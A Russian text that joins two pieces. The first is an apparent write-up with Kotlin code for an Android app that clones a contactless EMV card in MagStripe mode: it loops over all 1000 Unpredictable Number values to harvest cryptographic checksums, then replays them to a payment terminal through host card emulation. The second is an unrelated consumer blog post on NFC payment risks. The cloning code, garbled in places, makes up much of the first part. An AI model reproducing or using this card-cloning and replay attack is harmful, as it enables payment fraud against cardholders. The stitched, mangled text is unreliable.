data class Command( var CLA: String = 0x00.toString(), var INS: String = 0x00.toString(), var P1: String = "", var P2: String = "", var Lc: String = "", var Nc: String = "", var Le: String = "", var Nr: String = "", var SW1WS2: String = "" ) < fun split(): ByteArray < return getHexString().hexToByteArray() >fun getHexString() = CLA.plus(INS).plus(P1).plus(P2).plus(Lc).plus(Nc).plus(Le).plus(Nr).plus(SW1WS2) > 

Для начала нам нужно настроить работу с NFC. На телефоне мы можем работать в двух режимах. В режиме карты, это когда мы отвечаем на команды от терминала, и в режиме терминала когда отсылаем команды и производим считывание, например карты. Т.е. сначала мы можем клонировать карту, а потом сделать так чтобы на запросы от терминала мы отвечали уже заготовленными командами.

Далее упрощенная реализация взаимодействия с NFC:

 private var nfcAdapter: NfcAdapter? = null /*! < represents the local NFC adapter */ private var tag: Tag? = null /*!< represents an NFC tag that has been discovered */ private lateinit var tagcomm: IsoDep /*!< provides access to ISO-DEP (ISO 14443-4) */ private val nfctechfilter = arrayOf(arrayOf(NfcA::class.java.name)) /*!< NFC tech lists */ private var nfcintent: PendingIntent? = null . override fun onCreate(savedInstanceState: Bundle?) < super.onCreate(savedInstanceState) setContentView(R.layout.activity_main) nfcAdapter = NfcAdapter.getDefaultAdapter(this) nfcintent = PendingIntent.getActivity(this, 0, Intent(this, javaClass).addFlags(Intent.FLAG_ACTIVITY_SINGLE_TOP), 0) cardEmulation = CardEmulation.getInstance(nfcAdapter) nfcAdapter?.enableForegroundDispatch(this, nfcintent, null, nfctechfilter) >. override fun onNewIntent(intent: Intent) < super.onNewIntent(intent) tag = intent.getParcelableExtra(NfcAdapter.EXTRA_TAG) cardReading(tag) >. override fun onResume() < super.onResume() if (canSetPreferredCardEmulationService()) < this.cardEmulation?.setPreferredService(this, ComponentName(this, "com.nooan.cardpaypasspass.NfcService")); >> override fun onPause() < if (canSetPreferredCardEmulationService()) < this.cardEmulation?.unsetPreferredService(this) >super.onPause() > private fun cardReading(tag: Tag?) < tagcomm = IsoDep.get(tag) try < tagcomm.connect() >catch (e: IOException) < error = "Reading card data . Error tagcomm: " + e.message Toast.makeText(applicationContext, error, Toast.LENGTH_SHORT).show() return >try < when < commands != null ->readCardWithOurCommands() mChip -> readCardMChip() else -> readCardMagStripe() > > catch (e: IOException) < error = "Reading card data . Error tranceive: " + e.message Toast.makeText(applicationContext, error, Toast.LENGTH_SHORT).show() return >finally < tagcomm.close() >> protected fun execute(command: Command, log:Boolean): ByteArray

Здесь описывается последовательность команд и перебор значений Unpredictable Number в цикле от 0 до 999, в нужную нам команду изменяем Nc на «00000$«.replace(«..(?!$)».toRegex(), «$0 «). И не забываем выполнять GET_PROCESSING_OPTIONS каждый раз перед COMPUTE_CRYPTOGRAPHIC_CHECKSUM иначе чек сумма подсчитываться не будет.

В результате это все можно записать в файл и использовать уже при работе с настоящим терминалом. Здесь же мы получаем Имя и Номер карточки, можем отобразить это на экране.

 private fun readCardMagStripe() < try < var response = execute(Commands.SELECT_PPSE) // На основе предыдущего запроса формируем новый val select = Commands.SELECT_APPLICATION.apply < Nc = response.toHex().substring(52, 68) SW1WS2 = "00" >val cardtype: String = getTypeCard(select.split()) execute(select) execute(Commands.GET_PROCESSING_OPTIONS) response = execute(Commands.READ_RECORD_1.apply < P2 = "0C" Lc = "00" Le = "" Nc = "" >) if (cardtype === "MasterCard") < cardnumber = "Card number: $" cardexpiration = "Card expiration: $" showData() for (i in 0..999) < execute(Commands.GET_PROCESSING_OPTIONS, false) execute(Commands.COMPUTE_CRYPTOGRAPHIC_CHECKSUM.apply < Lc = "04" Nc = "00000$".replace("..(?!$)".toRegex(), "$0 ") >) > > finishRead() > 

Набор команд, которые нам необходимы.

object Commands

Чтобы реализовать прослушку команд от терминала, надо запустить свой сервис и объявить его в манифесте. В этом сервисе в processCommandApdu приходит команда от терминала, мы сопоставляем ее с той, что у нас хранится в файле, и отдаем ответ, который записан следующей строкой.

class NfcService : HostApduService() < fun getData(context: Context?): List < var list: List= arrayListOf() filePath?.let < if (it.isNotBlank()) < list = getCommands(Uri.fromFile(File(it)).readTextFromUri(context), this::showError) >else < Toast.makeText(applicationContext, "Not found file path", Toast.LENGTH_SHORT).show() >> return list > private var commands: List? = arrayListOf() override fun processCommandApdu(apdu: ByteArray?, bundle: Bundle?): ByteArray < commands = getData(applicationContext) commands?.forEachIndexed < i, command ->if (apdu.toHex() == command.getHexString()) < return commands!![i+1].split() >> Log.e("LOG", "Finnish") return Value.magStripModeEmulated.hexToByteArray() > 

Пара скриншотов из приложения. Считываем карту и парсим лог:

Таким образом можно смоделировать работу бесконтактной EMV карты на телефоне с данными карты. Но к счастью или к сожалению для кого-то, это атака не работает в России. По нашим экспериментам транзакция все время доходила до банка эмитента и отклонялась самим банком. Кроме того, у нас не получилось провести офлайн транзакцию с использованием MagStripe. Однако, подобная атака вполне может быть реализована в других странах, где использование MagStripe режима вполне обычное дело и алгоритм риск менеджмента немного другой, например в США.

Ссылки, с помощью которых появилась данная статья

Спасибо barracud4 за помощь в подготовке к статье.

Человек с терминалом, или Снова про бесконтактные платежи

Может ли злоумышленник украсть данные карты или деньги, незаметно используя бесконтактные NFC-платежи?

Как преступник может получить деньги или данные с карты, используя терминалы бесконтактной оплаты

Oleg Gorobets

  • 1 марта 2016
  • Тема безопасности бесконтактных платежей, основанных на технологии NFC, продолжает будоражить общественность. Исследователи во всем мире пробуют эту технологию «на прочность», проверяя, не слишком ли мы все беспечны, таская карточки в карманах рюкзаков и сумочек. Что можно потерять — только данные карточки или, быть может, и деньги тоже, невзирая на все меры безопасности?

    Как преступник может получить деньги или данные с карты, используя терминалы бесконтактной оплаты

    Тема-то потенциально серьезная. Мои коллеги по работе уже писали об этом не так давно. Изменилось ли что-то за полгода?

    Незаметное считывание

    Опыты показали, что стандартные приборы для бесконтактной оплаты: телефоны, PoS-терминалы и тому подобное — действительно работают только на ОЧЕНЬ маленьком расстоянии. Получается, что злоумышленники, конечно, могут извлечь какие-то данные вашей карты, но шанс маленький. К тому же требуются довольно недвусмысленные действия, которые можно заметить со стороны. Считыватель, спрятанный в кармане куртки, тут не поможет…

    …При условии, что он стандартный. Из не слишком дорогого набора деталей исследователям удалось собрать комплект, позволявший «подслушивать» транзакции и считывать данные карты на расстоянии до 45 см. Набор, правда, включал в себя рюкзак и тележку из супермаркета, в котором, собственно, и проводился опыт. В общем, с нестандартным считывателем шанс получить данные карты сильно возрастает, но требуется крупногабаритное оборудование.

    Несколько интереснее выглядело заражение троянцем Android-телефона с NFC-модулем. В варианте «храню телефон и деньги у сердца» картина вырисовывалась не слишком приятная: считать карты в таком случае гораздо легче, а главное — никто и не заметит. При желании злоумышленники могли бы установить связь с другим телефоном через сотовый канал связи и, пользуясь таким своеобразным «удлинителем», даже купить что-то на сумму менее тысячи рублей — в пределах ограничения «беспиновой» мини-транзакции. Очень хлопотный и неудобный способ, но вроде как реалистичный.

    Однако за прошедшее с момента публикации исследования время мне так и не удалось обнаружить ни одного подтвержденного случая успешного «удаленного» покушения на NFC-карты.

    Данные…

    Многочисленные исследования показали, что хакеру с его супермощным считывателем проще всего частично получить данные карты: номер и дату истечения срока действия плюс некоторую информацию о нескольких последних транзакциях. Маловато для чего-то серьезного? В целом скорее да. Однако исследователи из Which?, например, смогли обнаружить магазин, где полученных данных хватило, чтобы совершить покупку, заметно превышающую лимит «мини-транзакции», не требующей PIN.

    Несколько более сложный путь данные карты могут проделать, попав в базу данных торговцев-кардеров, чтобы потом, в не вполне обозримом будущем, возможно, стать частью некой теневой операции. С вышеупомянутым набором данных вероятность неприятностей по этой схеме несколько меньше, но ничего хорошего этот сценарий точно не обещает.

    Простейший вариант — вам звонит по телефону некая девушка «из банка» и с целью проверки/расследования инцидента/по другой очень убедительной причине просит вас назвать дополнительные данные карты, достраивая существующий набор до более полного. Понятно, что на самом деле барышня не из банка, потому что настоящие представители банков никогда так не делают.

    …или деньги?

    Обычных людей больше всего пугает то, что с их карты могут в теории снять деньги, используя функцию «мини-транзакции», когда для списания денег не нужно вводить PIN-код. Считать, конечно, можно — были бы терминал, способный проводить бесконтактные транзакции, и возможность подобраться с ним поближе к карте.

    Но тут мы вплотную подходим к тем мерам безопасности, которые даже старше портативных терминалов. Каждый кассовый аппарат с давних времен регистрировался — как минимум в налоговой инспекции. С появлением системы электронных платежей каждый терминал (если это независимый терминал, а не PoS-система) регистрируется при заключении договора с банком-эквайером.

    Паспорт и прочие подтверждения сущности/личности фирмы/продавца — обязательны. Без этого денежные взаимоотношения между покупателем и торговцем (по сути, эквивалентные безналичному обмену между банком торговца, банком-эквайером и банком, выдавшим карту покупателю) просто невозможны.

    Как преступник может получить деньги или данные с карты, используя терминалы бесконтактной оплаты

    Любая мошенническая транзакция, будучи опротестованной, может быть отслежена до терминала, с которого она была инициирована, и его владельца. Соответственно, опротестованная транзакция отменяется, деньги возвращаются, а владельцем терминала начинают плотно интересоваться компетентные органы.
    Тут, однако, начинается серая зона.

    Что, если…

    • Хозяин карты недостаточно внимательно читал пункт договора, в котором написано, что те самые мини-транзакции «до 1000 руб.» опротестованию не подлежат? (Ни разу сам не видел, но, говорят, бывает.)
    • Время опротестования мини-транзакций заметно меньше, чем у более крупных платежей, а клиент вовремя не заметил SMS от банка?
    • Терминал зарегистрирован на поддельную фирму, записанную на чужие данные? Кража паспортов — не такое уж редкое явление, особенно с учетом того, что биометрические документы пока еще распространены отнюдь не повсеместно.

    При желании можно придумать еще обстоятельства, чаще всего связанные с тем, что кто-то недостаточно тщательно выполняет свою часть действий, обеспечивающих безопасность платежа. Будьте внимательны к тому, с кем именно вы имеете дело, и всегда досконально выясняйте, каковы условия, на которые вы подписываетесь.

    Что касается фирм, зарегистрированных на чужое имя, то, мне кажется, подобного рода мошенничество организуется ради гораздо более серьезных операций, нежели попытка увести с чужих карт несколько десятков тысяч рублей, которые попросту не окупят криминальные вложения.

    Ах да, есть еще вариант с незадачливым курьером, потерявшим терминал. Но он не для преступников: вывести деньги со счета фирмы, на которую зарегистрирован терминал, можно только, например, взломав электронный банк. И зачем тогда, спрашивается, вообще красть терминал?

    Что делать-то?

    Да и надо ли вообще что-то делать? Каждый решает сам. Просто помните, что эксперимент, требующий рюкзака и тележки из супермаркета, завтра может стать реальностью.

    Вот что я решил для себя:

    • хранить бесконтактные карточки в контролируемой зоне в одежде на груди. Не рядом с телефоном;
    • несмотря на отсутствие прямой и непосредственной угрозы, рассмотреть вопрос об экранированном хранилище;
    • сохранять чеки при пользовании картой. При опротестовании жульнической транзакции наличие чеков по платежам за период, в который все и произошло, может, по крайней мере по словам банковских сотрудников поддержки, помочь в расследовании и снизить шансы на то, что деньги пропадут безвозвратно;
    • регулярно убеждаться, что с защитными решениями на всех моих устройствах все в порядке и они регулярно обновляются. Их наличие даже не обсуждается. Я выбрал Kaspersky Total Security для всех устройств — в нем есть специальный компонент для защиты электронных платежей, им можно управлять из облака, а в случае кражи моего телефона с NFC можно этот самый телефон заблокировать. Кроме того, среди мобильных троянцев есть куда более неприятные экземпляры, особенно для тех, кто, как я, активно пользуется электронным банкингом, и Kaspersky Internet Security их успешно ловит.

    Добавить комментарий

    Ваш адрес email не будет опубликован. Обязательные поля помечены *